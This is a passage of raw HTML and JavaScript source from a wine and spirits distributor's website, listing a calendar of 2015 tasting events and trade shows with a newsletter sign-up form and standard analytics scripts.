src="http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/fairview-wines-spirits-tastings/">Fairview Wines &#038; Spirits Tastings</a><span>Fairview Wine & Spirits</span>', start: ' 2015-11-13' }, { title: 'Tiano &#038; Narano Introduction', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/tiano-narano-introduction/">Tiano &#038; Narano Introduction</a><span>Floor 13</span>', start: ' 2015-11-10' }, { title: 'In Store Tasting at Wine Rack', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/in-store-tasting-at-wine-rack/">In Store Tasting at Wine Rack</a><span>Wine Rack</span>', start: ' 2015-11-06' }, { title: 'NEW JERSEY HARVEST WINE FESTIVAL', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/new-jersey-harvest-wine-festival/">NEW JERSEY HARVEST WINE FESTIVAL</a><span>Hilton Short Hills</span>', start: ' 2015-11-06' }, { title: 'Main Street Wine Cellar Charity Tasting featuring Jax Vineyards', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/main-street-wine-cellar-charity-tasting-featuring-jax-vineyards/">Main Street Wine Cellar Charity Tasting featuring Jax Vineyards</a><span>Main Street Wine Cellar</span>', start: ' 2015-11-05' }, { title: 'White Rock at &#8220;Taste Napa Valley Wines Past &#038; Present&#8221;', bg:'http://domaineselect.com/wp-content/uploads/2015/05/DSWS.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/05/DSWS-100x100.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/white-rock-at-taste-napa-valley-wines-past-present/">White Rock at &#8220;Taste Napa Valley Wines Past &#038; Present&#8221;</a><span>The Gander</span>', start: ' 2015-11-09' }, { title: 'Vinecraft Champagne + Sake', bg:'http://domaineselect.com/wp-content/uploads/2015/11/Screen-Shot-2015-11-02-at-2.35.36-PM.png', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/11/Screen-Shot-2015-11-02-at-2.35.36-PM-100x100.png" alt="" /> </span><a href="http://domaineselect.com/featured_events/vinecraft-champagne-sake/">Vinecraft Champagne + Sake</a><span>Vinecraft</span>', start: ' 2015-11-24' }, { title: 'Diplomatico at Big Smoke New York', bg:'http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/diplomatico-at-big-smoke-new-york/">Diplomatico at Big Smoke New York</a><span>Pier 92</span>', start: ' 2015-12-03' }, { title: 'Diplomatico Rum at Big Smoke Las Vegas 2015', bg:'http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/diplomatico-rum-at-big-smoke-las-vegas-2015/">Diplomatico Rum at Big Smoke Las Vegas 2015</a><span>Mirage Hotel</span>', start: ' 2015-11-13' }, { title: 'Women Who Whiskey &#038; Usquaebach Scotch', bg:'http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/women-who-whiskey-usquaebach-scotch/">Women Who Whiskey &#038; Usquaebach Scotch</a><span>Whiskey Social</span>', start: ' 2015-11-04' }, { title: 'Diplomatico Rum at South American Trade Forum', bg:'http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/diplomatico-rum-at-south-american-trade-forum/">Diplomatico Rum at South American Trade Forum</a><span>Minneapolis Events Center - St Anthony Main Location</span>', start: ' 2015-10-28' }, { title: 'An evening with Diplomático Rum at Artisanal Fromagerie &#038; Bistro', bg:'http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/an-evening-with-diplomatico-rum-at-artisanal-fromagerie-bistro/">An evening with Diplomático Rum at Artisanal Fromagerie &#038; Bistro</a><span>Artisanal Fromagerie & Bistro</span>', start: ' 2015-10-29' }, { title: 'The Magician of Movia: Ales Kristancic U.S Tour 2015 (NYC)', bg:'http://domaineselect.com/wp-content/uploads/2015/07/a-plus-logo1.png', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/a-plus-logo1.png" alt="" /> </span><a href="http://domaineselect.com/featured_events/the-magician-of-movia-ales-kristancic-u-s-tour-2015-nyc/">The Magician of Movia: Ales Kristancic U.S Tour 2015 (NYC)</a><span>Floor 13</span>', start: ' 2015-10-27' }, { title: 'Music to Mouth 2015', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/music-to-mouth-2015/">Music to Mouth 2015</a><span>Village Park</span>', start: ' 2015-11-19' }, { title: 'Diplomatico Rum night at The Churchill', bg:'http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/diplomatico-rum-night-at-the-churchill/">Diplomatico Rum night at The Churchill</a><span>The Churchill</span>', start: ' 2015-11-04' }, { title: 'WhistlePig night at Beer Culture', bg:'http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/whistlepig-night-at-beer-culture/">WhistlePig night at Beer Culture</a><span>Beer Culture</span>', start: ' 2015-10-21' }, { title: 'Tasting at East Village Wine &#038; Liquor', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/tasting-at-east-village-wine-liquor/">Tasting at East Village Wine &#038; Liquor</a><span>East Village Wine & Liquor </span>', start: ' 2015-10-15' }, { title: 'Spirits tasting at Varmax Liquor Pantry', bg:'http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/spirits-tasting-at-varmax-liquor-pantry/">Spirits tasting at Varmax Liquor Pantry</a><span>Varmax Liquor Pantry</span>', start: ' 2015-10-10' }, { title: 'Diplomatico Rum at Craft Spirits Festival Miami', bg:'http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/diplomatico-at-craft-spirits-festival-miami/">Diplomatico Rum at Craft Spirits Festival Miami</a><span>The Cruz Building</span>', start: ' 2015-10-08' }, { title: 'Tasting at Squarewine &#038; Spirits​', bg:'http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/tasting-at-squarewine-spirits%e2%80%8b/">Tasting at Squarewine &#038; Spirits​</a><span>Squarewine & Spirits​</span>', start: ' 2015-10-01' }, { title: 'SAVOR ITALY presented by The Merano Wine Festival', bg:'http://domaineselect.com/wp-content/uploads/2015/07/Screen-Shot-2015-07-27-at-4.14.28-PM.png', description: '<span class="images"></span><a href="http://domaineselect.com/featured_events/savor-italy-presented-by-the-merano-wine-festival/">SAVOR ITALY presented by The Merano Wine Festival</a><span>Manhattan Penthouse</span>', start: ' 2015-10-05' }, { title: 'Young New York Party sponsored by Diplomatico Rum', bg:'http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/young-new-york-party-sponsored-by-diplomatico-rum/">Young New York Party sponsored by Diplomatico Rum</a><span>Marquee NY</span>', start: ' 2015-10-01' }, { title: 'Domaine Select at Stew Leonard&#8217;s Wine Store &#8220;Grand Fall Tasting&#8221;', description: '<span class="images"></span><a href="http://domaineselect.com/featured_events/domaine-select-at-stew-leonards-wine-store-grand-fall-tasting/">Domaine Select at Stew Leonard&#8217;s Wine Store &#8220;Grand Fall Tasting&#8221;</a><span>Stew Leonards Wine Store</span>', start: ' 2015-09-26' }, { title: 'Sake Class With Sake Sommelier Haruka Black &#8211; Harrison Wine Vault', description: '<span class="images"></span><a href="http://domaineselect.com/featured_events/sake-class-with-sake-sommelier-haruka-black-harrison-wine-vault/">Sake Class With Sake Sommelier Haruka Black &#8211; Harrison Wine Vault</a><span>Harrison Wine Vault</span>', start: ' 2015-09-24' }, { title: 'HOLIDAY COCKTAIL LOUNGE POP-UP &#038; EXQUISITE SELECTION TASTING', bg:'http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/holiday-package-cocktail-show/">HOLIDAY COCKTAIL LOUNGE POP-UP &#038; EXQUISITE SELECTION TASTING</a><span>FLOOR THIRTEEN</span>', start: ' 2015-10-07' }, { title: '2015 Super Tasting &#8211; The Manor in West Orange', description: '<span class="images"></span><a href="http://domaineselect.com/featured_events/2015-super-tasting-the-manor-in-west-orange/">2015 Super Tasting &#8211; The Manor in West Orange</a><span>The Manor</span>', start: ' 2015-10-12' }, { title: 'Tasting at Summerhill Marketplace &#8211; East Brunswick', description: '<span class="images"></span><a href="http://domaineselect.com/featured_events/tasting-at-summerhill-marketplace-east-brunswick/">Tasting at Summerhill Marketplace &#8211; East Brunswick</a><span>Summerhill Marketplace</span>', start: ' 2015-09-19' }, { title: 'Cocktail Caboose on the Cuyahoga Valley Scenic Railway', bg:'http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/cocktail-caboose-on-the-cuyahoga-valley-scenic-railway/">Cocktail Caboose on the Cuyahoga Valley Scenic Railway</a><span>Cuyahoga Valley Scenic Railway</span>', start: ' 2015-09-17' }, { title: 'Wine at the Line Tasting &#8211; Freeland, Maryland', description: '<span class="images"></span><a href="http://domaineselect.com/featured_events/wine-at-the-line-tasting-maryland/">Wine at the Line Tasting &#8211; Freeland, Maryland</a><span>Maryland Line Volunteer Fire Co.</span>', start: ' 2015-09-19' }, { title: 'DSWS &#8216;Kicking It Off&#8217; Fall Focus Tasting', description: '<span class="images"></span><a href="http://domaineselect.com/featured_events/dsws-kicking-it-off-fall-focus-tasting/">DSWS &#8216;Kicking It Off&#8217; Fall Focus Tasting</a><span>Floor Thirteen </span>', start: ' 2015-10-05' }, { title: 'Tasting at Buy Rite in Milltown', description: '<span class="images"></span><a href="http://domaineselect.com/featured_events/tasting-at-buy-rite-in-milltown/">Tasting at Buy Rite in Milltown</a><span>Buy Rite</span>', start: ' 2015-10-02' }, { title: 'Tasting at Pinos Highland Park', description: '<span class="images"></span><a href="http://domaineselect.com/featured_events/tasting-at-pinos-highland-park/">Tasting at Pinos Highland Park</a><span>Pinos Highland Park</span>', start: ' 2015-09-18' }, { title: 'Ronald Mc Donald House Charity Tasting &#038; Adelphia Wine Company', description: '<span class="images"></span><a href="http://domaineselect.com/featured_events/ronald-mc-donald-house-charity-tasting-adelphia-wine-company/">Ronald Mc Donald House Charity Tasting &#038; Adelphia Wine Company</a><span> Ronald Mc Donald House </span>', start: ' 2015-09-25' }, { title: 'Ferragosto 2015', description: '<span class="images"></span><a href="http://domaineselect.com/featured_events/ferragosto-2015/">Ferragosto 2015</a><span>Belmont Little Italy</span>', start: ' 2015-09-13' }, { title: 'Brunch &#038; Mixology Presented by Diplomatico Rum', bg:'http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/brunch-mixology-presented-by-diplomatico-rum/">Brunch &#038; Mixology Presented by Diplomatico Rum</a><span>Novecento</span>', start: ' 2015-10-04' }, { title: 'Tasting at Joe Canals &#8211; West Deptford, NJ', description: '<span class="images"></span><a href="http://domaineselect.com/featured_events/tasting-at-joe-canals-west-deptford-nj/">Tasting at Joe Canals &#8211; West Deptford, NJ</a><span>Joe Canals</span>', start: ' 2015-10-23' }, { title: 'Tasting at The Wine Rack &#8211; Basking Ridge, NJ', description: '<span class="images"></span><a href="http://domaineselect.com/featured_events/tasting-at-the-wine-rack-basking-ridge-nj/">Tasting at The Wine Rack &#8211; Basking Ridge, NJ</a><span>The Wine Rack</span>', start: ' 2015-09-25' }, { title: 'Tasting at Gerards Wine and Spirits &#8211; Point Pleasant, NJ', description: '<span class="images"></span><a href="http://domaineselect.com/featured_events/tasting-at-gerards-wine-and-spirits-point-pleasant-nj/">Tasting at Gerards Wine and Spirits &#8211; Point Pleasant, NJ</a><span>Gerards Wine and Spirits</span>', start: ' 2015-09-11' }, { title: 'Grounds For Sculpture (GFS) 15th annual Epicurean Palette', description: '<span class="images"></span><a href="http://domaineselect.com/featured_events/grounds-for-sculpture-gfs-15th-annual-epicurean-palette/">Grounds For Sculpture (GFS) 15th annual Epicurean Palette</a><span>Grounds For Sculpture</span>', start: ' 2015-09-27' }, { title: 'Holiday Trade Tasting', description: '<span class="images"></span><a href="http://domaineselect.com/featured_events/holiday-trade-tasting/">Holiday Trade Tasting</a><span>PlumpJack Squaw Valley Inn - Lake Tahoe</span>', start: ' 2015-11-02' }, { title: 'Tuthilltown &#8211; Service Appreciation Day', bg:'http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/tuthilltown-service-appreciation-day/">Tuthilltown &#8211; Service Appreciation Day</a><span>14 Grist Mill Lane, Gardiner, NY</span>', start: ' 2015-09-28' }, { title: 'Tuthilltown &#8211; Retail Appreciation Day', bg:'http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/tuthilltown-retail-appreciation-day/">Tuthilltown &#8211; Retail Appreciation Day</a><span>14 Grist Mill lane, Gardiner, NY</span>', start: ' 2015-09-21' }, { title: 'Wine &#038; Spirits 12th Annual Top 100 Tasting &#8211; Featuring Movia', description: '<span class="images"></span><a href="http://domaineselect.com/featured_events/wine-spirits-12th-annual-top-100-tasting-featuring-movia/">Wine &#038; Spirits 12th Annual Top 100 Tasting &#8211; Featuring Movia</a><span>City View at Metreon</span>', start: ' 2015-10-20' }, { title: 'USBG St. Louis Gala featuring cocktails with G&#8217;Vine Floraison, Suze and LaQuintinye Blanc', bg:'http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/usbg-st-louis-gala-featuring-cocktails-with-gvine-floraison-suze-and-laquintinye-blanc/">USBG St. Louis Gala featuring cocktails with G&#8217;Vine Floraison, Suze and LaQuintinye Blanc</a><span>St Louis, Kansas</span>', start: ' 2015-09-06' }, { title: 'Best Brands Trade Show in Nashville', description: '<span class="images"></span><a href="http://domaineselect.com/featured_events/best-brands-trade-show-in-nashville/">Best Brands Trade Show in Nashville</a><span>Nashville, TN</span>', start: ' 2015-10-14' }, { title: 'An Evening in Italy with Adam Fox &#8211; Savi Provisions Market in Atlanta', description: '<span class="images"></span><a href="http://domaineselect.com/featured_events/an-evening-in-italy-with-adam-fox-savi-provisions-market-in-atlanta/">An Evening in Italy with Adam Fox &#8211; Savi Provisions Market in Atlanta</a><span>3655 Roswell Road, Suite 130, Atlanta, GA</span>', start: ' 2015-10-10' }, { title: 'Nashville Haverst Wine Market In-Store Tasting', description: '<span class="images"></span><a href="http://domaineselect.com/featured_events/nashville-haverst-wine-market-in-store-tasting/">Nashville Haverst Wine Market In-Store Tasting</a><span>Westgate Shopping Center, 6043 TN-100, Nashville, TN</span>', start: ' 2015-09-03' }, { title: 'Champagne Tasting and Presale Event at Empire State South in Atlanta', description: '<span class="images"></span><a href="http://domaineselect.com/featured_events/champagne-tasting-and-presale-event-at-empire-state-south-in-atlanta/">Champagne Tasting and Presale Event at Empire State South in Atlanta</a><span>999 Peachtree St NE Suite 140, Atlanta, GA</span>', start: ' 2015-09-02' }, { title: 'Avant Partir Trade Show at W Hotel Midtown Atlanta', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/Screen-Shot-2015-07-27-at-4.14.28-PM.png" alt="" /> </span><a href="http://domaineselect.com/featured_events/avant-partir-trade-show-at-w-hotel-midtown/">Avant Partir Trade Show at W Hotel Midtown Atlanta</a><span>45 Ivan Allen Jr. Boulevard Atlanta, GA</span>', start: ' 2015-08-31' }, { title: 'Gracias a Dios Mezcal Launch Party', bg:'http://domaineselect.com/wp-content/uploads/2015/07/classic-and-vintage-logo.png', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/classic-and-vintage-logo-100x100.png" alt="" /> </span><a href="http://domaineselect.com/featured_events/gracias-a-dios-mezcal-launch-party/">Gracias a Dios Mezcal Launch Party</a><span>105 Madison Avenue, New York , NY</span>', start: ' 2015-09-01' }, { title: 'J. LIM Swim Summer 2016 Preview with Gracias a Dios Mezcal, Mizu Shochu and Diplomatico Rum.', bg:'http://domaineselect.com/wp-content/uploads/2015/07/classic-and-vintage-logo.png', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/classic-and-vintage-logo-100x100.png" alt="" /> </span><a href="http://domaineselect.com/featured_events/j-lim-swim-summer-2016-preview-with-gracias-a-dios-mezcal-mizu-shochu-and-diplomatico-rum/">J. LIM Swim Summer 2016 Preview with Gracias a Dios Mezcal, Mizu Shochu and Diplomatico Rum.</a><span></span>', start: ' 2015-08-26' }, { title: 'California Rum Festival', bg:'http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/california-rum-festival/">California Rum Festival</a><span>Terra Gallery</span>', start: ' 2015-09-12' }, { title: 'Los Angeles Food &#038; Wine', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/los-angeles-food-wine/">Los Angeles Food &#038; Wine</a><span>Los Angeles</span>', start: ' 2015-08-27' }, { title: '9th Annual WhiskyFest San Francisco', bg:'http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/9th-annual-whiskyfest-san-francisco/">9th Annual WhiskyFest San Francisco</a><span>San Francisco Marriott Marquis</span>', start: ' 2015-10-30' }, { title: '18th Annual WhiskyFest New York', bg:'http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/18th-annual-whiskyfest-new-york/">18th Annual WhiskyFest New York</a><span>New York Marriott Marquis</span>', start: ' 2015-09-24' }, { title: 'Maserati Brunch with Diplomatico', bg:'http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/maserati-brunch-with-diplomatico/">Maserati Brunch with Diplomatico</a><span>Bridgehampton</span>', start: ' 2015-08-08' }, { title: 'GrillHampton with Diplomatico', bg:'http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/grillhampton-with-diplomatico/">GrillHampton with Diplomatico</a><span>Bridgehampton</span>', start: ' 2015-07-17' }, { title: 'Diplomatico at Taste of Two Forks', bg:'http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/diplomatico-at-taste-of-two-forks/">Diplomatico at Taste of Two Forks</a><span>Bridgehampton</span>', start: ' 2015-07-18' }, { title: 'Cliffton Dry &#8211; DIFFA Picnic by Design', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/diffa-picnic-by-design-featuring-cliffton-dry/">Cliffton Dry &#8211; DIFFA Picnic by Design</a><span>Ramscale Studio</span>', start: ' 2015-08-05' }, { title: 'Toasting the Town &#8211; NYC', bg:'http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/toasting-the-town-nyc/">Toasting the Town &#8211; NYC</a><span>The Prince George Ballroom on 27th Street between 5th and Madison</span>', start: ' 2015-07-09' }, { title: 'Hamptons Brunch With Lamborghini', bg:'http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/hamptons-lunch-with-lamborghini/">Hamptons Brunch With Lamborghini</a><span>Hamptons</span>', start: ' 2015-06-25' }, { title: 'Classic &#038; Vintage at Tales of the Cocktail', bg:'http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/07/CVicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/classic-vintage-at-tales-of-the-cocktail/">Classic &#038; Vintage at Tales of the Cocktail</a><span>New Orleans </span>', start: ' 2015-07-19' }, { title: 'Food &#038; Wine Classic in Aspen 2015', bg:'http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg', description: '<span class="images"> <img src="http://domaineselect.com/wp-content/uploads/2015/06/DSWSicon.jpg" alt="" /> </span><a href="http://domaineselect.com/featured_events/food-wine-classic-in-aspen-2015/">Food &#038; Wine Classic in Aspen 2015</a><span>Aspen</span>', start: ' 2015-06-25' }, ] }); }); </script> <div class="event_holder_box"> <div id='calendar'></div> <script type="text/javascript"> //<![CDATA[ if (typeof newsletter_check !== "function") { window.newsletter_check = function (f) { var re = /^([a-zA-Z0-9_\.\-\+])+\@(([a-zA-Z0-9\-]{1,})+\.)+([a-zA-Z0-9]{2,})+$/; if (!re.test(f.elements["ne"].value)) { alert("The email is not correct"); return false; } for (var i=1; i<20; i++) { if (f.elements["np" + i] && f.elements["np" + i].value == "") { alert(""); return false; } } if (f.elements["ny"] && !f.elements["ny"].checked) { alert("You must accept the privacy statement"); return false; } return true; } } //]]> </script> <script type="text/javascript">(function() { if (!window.mc4wp) { window.mc4wp = { listeners: [], forms : { on: function (event, callback) { window.mc4wp.listeners.push({ event : event, callback: callback }); } } } } })(); </script><!-- MailChimp for WordPress v3.1.11 - https://wordpress.org/plugins/mailchimp-for-wp/ --><form id="mc4wp-form-1" class="mc4wp-form mc4wp-form-15625 mc4wp-form-basic" method="post" data-id="15625" data-name="Default sign-up form" ><div class="mc4wp-form-fields"><div class="newsletter newsletter-subscription"> <h3>Sign up for our newsletter</h3> <div class="signup-input"> <input type="email" name="EMAIL" class="newsletter-email" placeholder="Enter Your Email" required="required"> <input class="newsletter-submit" type="submit" value="SIGN UP"> </div> </div> <div style="display: none;"><input type="text" name="_mc4wp_honeypot" value="" tabindex="-1" autocomplete="off" /></div><input type="hidden" name="_mc4wp_timestamp" value="1558021023" /><input type="hidden" name="_mc4wp_form_id" value="15625" /><input type="hidden" name="_mc4wp_form_element_id" value="mc4wp-form-1" /></div><div class="mc4wp-response"></div></form><!-- / MailChimp for WordPress Plugin --> </div> </div> </div> </div> </div> </div> </div><!-- #wrapper --> <footer id="footer" role="contentinfo"> <div class="clearfix"> <div class="left-content"> <nav id="nav-footer"> <div class="menu-footer-menu-container"><ul id="menu-footer-menu" class="menu"><li id="menu-item-168" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-168"><a href="http://domaineselect.com/company/">COMPANY</a></li> <li id="menu-item-165" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-165"><a href="http://domaineselect.com/import-portfolio/">IMPORTS PORTFOLIO</a></li> <li id="menu-item-164" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-164"><a href="http://domaineselect.com/wholesale-portfolio/">WHOLESALE PORTFOLIO</a></li> <li id="menu-item-11513" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-11513"><a href="http://domaineselect.com/privacy-policy/">Privacy Policy</a></li> <li id="menu-item-11535" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-11535"><a href="http://jobs.domaineselect.com/">Career Opportunities</a></li> <li id="menu-item-166" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-166"><a href="http://domaineselect.com/contact-us/">CONTACT US</a></li> </ul></div> </nav> <div class="site-info"> <div id="widget-area" class="widget-area" role="complementary"> <aside id="text-3" class="widget widget_text"> <div class="textwidget">© copyright 2015 Domaine Select Wine & Spirits, LLC</div> </aside> </div><!-- .widget-area --> </div> </div> <div class="right-content"> <div class="footer-address"> 105 madison avenue, 13th floor new york, ny 10016 </div> <div id="widget-area" class="widget-area social-links" role="complementary"> <aside id="text-4" class="widget widget_text"> <div class="textwidget"> <div class="social"> <a class="social_btn_facebook" href="https://www.facebook.com/DomaineSelect" target="_blank"><i class="ic ic-facebook"></i></a> <a class="social_btn_twitter" href="https://twitter.com/domaineselect" target="_blank"><i class="ic ic-twitter"></i></a> <a class="social_btn_instagram" href="https://instagram.com/domaineselect/" target="_blank"><i class="ic ic-instagramm"></i></a> <a href="https://www.pinterest.com/domaineselect/" target="_blank"><i class="ic ic-pinterest"></i></a> <a class="social_btn_storify" href="https://storify.com/domaineselect/" target="_blank"><i class="ic ic-storify"></i></a> <a class="social_btn_youtube" href="https://www.youtube.com/user/DomaineSelect" target="_blank"><i class="ic ic-youtube"></i></a> </div></div> </aside> </div><!-- .widget-area </div> </div> </footer><!-- .site-footer --> <!-- Google Tag Manager --> <noscript><iframe src="//www.googletagmanager.com/ns.html?id=GTM-5Q95DP" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript> <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= '//www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-5Q95DP');</script> <!-- End Google Tag Manager --> <!-- adjusted bounce rate --> <script type="text/javascript" src="http://domaineselect.com/wp-content/plugins/adjusted-bounce-rate/js/adjusted-bounce-rate.min.js?v=1.2.1"></script> <script type="text/javascript"> jQuery(document).ready(function() { gkn.AdjustedBounceRate.init({ engagement_interval_seconds: 45, min_engagement_seconds: 20, max_engagement_seconds: 600, engagement_event_category: 'engagement-hit', engagement_event_action: 'time-on-page', debug_mode: false }); }); </script> <!-- end adjusted bounce rate --> <script type='text/javascript' src='http://domaineselect.com/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://domaineselect.com/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://domaineselect.com/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://domaineselect.com/wp-includes/js/jquery/ui/resizable.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://domaineselect.com/wp-includes/js/jquery/ui/draggable.min.js?ver=1.11.4'></script> <script type='text/javascript' 